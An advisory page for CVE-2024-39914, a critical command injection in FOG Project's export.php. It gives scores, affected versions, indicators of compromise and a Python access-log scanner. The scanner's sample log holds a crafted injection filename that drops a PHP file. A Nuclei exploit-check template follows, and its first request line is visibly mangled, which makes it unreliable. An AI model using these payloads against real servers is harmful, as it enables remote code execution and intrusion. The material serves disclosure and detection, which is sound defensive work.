CVE-2024-39914
Published 2024-07-12
Priority: P1 (90) · critical · CVSS 3.1 base score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
In-the-wild exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 23.41% (97.5th percentile)
FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php. This vulnerability is fixed in 1.5.10.34.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fogproject | fogproject | < 1.5.10.34 | 1.5.10.34 |
| fogproject | fogproject | < 1.5.10.41 | 1.5.10.41 |
Detection & IOCs (extracted from sources)
- The injected PHP file is then retrieved via GET /management/<filename>.php; a successful exploit response contains the MD5 of a numeric payload in the body with content-type text/html and HTTP 200.
- The intermediate exploitation step is confirmed when the export response body contains both the 'No HTML files!' and 'HTMLDOC' strings with content-type application/pdf and HTTP 200.
- The vulnerable code path is in packages/web/lib/fog/reportmaker.class.php; monitor for unsanitised 'filename' values containing shell special characters (e.g., single quote, redirection operators) reaching this file.
- The vulnerability exists only in FOG versions prior to 1.5.10.34; systems running 1.5.10.34 or later are not affected.
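The three IOCs above (a tainted filename parameter to export.php, followed by a GET of the dropped .php file) translate directly into a log-side detection. The following scanner is an added example written for this page, not FOG Project code and not the Nuclei template; the access-log lines, the regex for the combined log format, and the metacharacter list are all constructed assumptions for illustration.

```python
"""Flag FOG export.php requests whose filename parameter carries shell metacharacters,
and the follow-up fetch of a .php file such a request tried to write.

Added example for this page (not FOG Project code). The log lines in SAMPLE_LOG
are constructed for the example, not captured from a real host.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Characters that let an attacker break out of a shell command built from 'filename'.
# Assumption: this list is illustrative, not taken from the FOG source.
SHELL_META = set("'\";|&$`()<>\n")

# Request field of an Apache/nginx combined-format line: "METHOD /path?query HTTP/x.y" status
_LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample: one benign CSV export, one injection attempt writing abcde.php,
# the fetch of that dropped file, and an unrelated page load.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jul/2024:10:01:02 +0000] "GET /fog/management/export.php?filename=hosts&type=csv HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Jul/2024:10:02:15 +0000] "POST /fog/management/export.php?filename=x%27%3E%20../management/abcde.php%3B%27&type=pdf HTTP/1.1" 200 1024',
    '10.0.0.9 - - [12/Jul/2024:10:02:16 +0000] "GET /fog/management/abcde.php HTTP/1.1" 200 32',
    '10.0.0.7 - - [12/Jul/2024:10:03:00 +0000] "GET /fog/management/index.php HTTP/1.1" 200 2048',
]


def export_filename(target):
    """Return the decoded 'filename' query value of an export.php request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/management/export.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("filename")
    if not values:
        return None
    # parse_qs already percent-decodes once; decode again to catch double encoding.
    return unquote(values[0])


def suspicious_filename(name):
    """True if the filename contains a shell metacharacter or tries to leave its directory."""
    return any(c in SHELL_META for c in name) or "/" in name or ".." in name


def scan_access_log(lines):
    """Return (kind, detail) findings in log order.

    'injection'          a tainted filename reached export.php
    'dropped-file-fetch' a later HTTP 200 GET under /management/ of a .php name
                         that an earlier injection attempt tried to write
    """
    findings = []
    written = set()  # *.php tokens seen inside injection payloads
    for line in lines:
        m = _LOG_RE.search(line)
        if not m:
            continue
        target, status = m.group("target"), int(m.group("status"))
        name = export_filename(target)
        if name is not None and suspicious_filename(name):
            findings.append(("injection", name))
            written.update(re.findall(r"([\w.-]+\.php)", name))
            continue
        path = urlsplit(target).path
        base = path.rsplit("/", 1)[-1]
        if "/management/" in path and base in written and status == 200:
            findings.append(("dropped-file-fetch", path))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_access_log(SAMPLE_LOG):
        print(f"{kind}: {detail}")
```

The second-stage match deliberately keys on the .php name carried in the payload rather than on any fixed file name, since the template randomises it; a bare alert on any unknown .php under /management/ returning 200 is a reasonable, noisier fallback on hosts where the injection request itself was not logged.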
CVSS provenance
- NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 9.8 CRITICAL
No detection rules found.
Nuclei template: CVE-2024-39914 [CRITICAL] FOG Project < 1.5.10.34 - Remote Command Execution (CVSS 9.8)

```yaml
http:
  - raw:
      - |
        FOG Project '+>+{(unknown)}.php)&type=pdf HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        fogguiuser=fog&nojson=2

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"No HTML files!","HTMLDOC")'
          - 'contains(content_type, "application/pdf")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /management/{(unknown)}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"{{md5(num)}}")'
          - 'contains(content_type, "text/html")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100f36ff0fdf9a145bb2136b8c66454208981ba03f235950d2f64252ba2af398691022100fee49f7816f2c12444f9dc5c129e97f258936e1b45fbf5eb375a0aa9a2a0940f:922c64590222798bb761d5b6d8e72950
```
References
- https://github.com/FOGProject/fogproject/commit/2413bc034753c32799785e9bf08164ccd0a2759f
- https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j